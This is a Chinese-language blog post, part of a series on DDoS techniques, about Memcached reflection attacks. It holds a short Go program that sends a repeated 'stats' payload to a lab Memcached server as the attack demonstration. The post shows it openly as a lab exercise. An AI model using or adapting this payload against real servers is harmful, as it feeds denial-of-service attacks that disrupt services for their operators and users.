iT邦幫忙

2023 iThome 鐵人賽

DAY 24
0
SideProject30

DDOS:閑的沒事就開始DDOS系列 第 24

[Day 24] 閑的沒事 - Memcached反射攻擊

  • 分享至 

  • xImage
  •  

Memcached

Memcached跟Redis都是常見的快取(Caching)和分佈式數據儲存解決方案,兩者都是in-memory database,兩者都提供使用者低延遲、高效率來存取資料。兩者通常也都忘記設定權限。

測試

stats

攔截封包

發送一個stats反射的封包

code

先用Dial發送一個

package main

import (
	"fmt"
	"log"
	"net"
	"time"
)

func main() {
	targetIP := "10.211.55.10"
	targetPort := 11211

	// 构建TCP连接
	conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", targetIP, targetPort), 10*time.Second)
	if err != nil {
		log.Fatal(err)
	}
	defer conn.Close()

	// 构建Payload数据
	payload := "stats\r\nstats\r\nstats\r\nstats items\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\n"

	// 发送数据包
	_, err = conn.Write([]byte(payload))
	if err != nil {
		log.Fatal(err)
	}

	fmt.Println("Packet sent successfully!")
}

上一篇
[Day 23] 閑的沒事 - CLDAP放大攻擊
下一篇
[Day 25] 閑的沒事 - QOTD反射攻擊
系列文
DDOS:閑的沒事就開始DDOS31
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言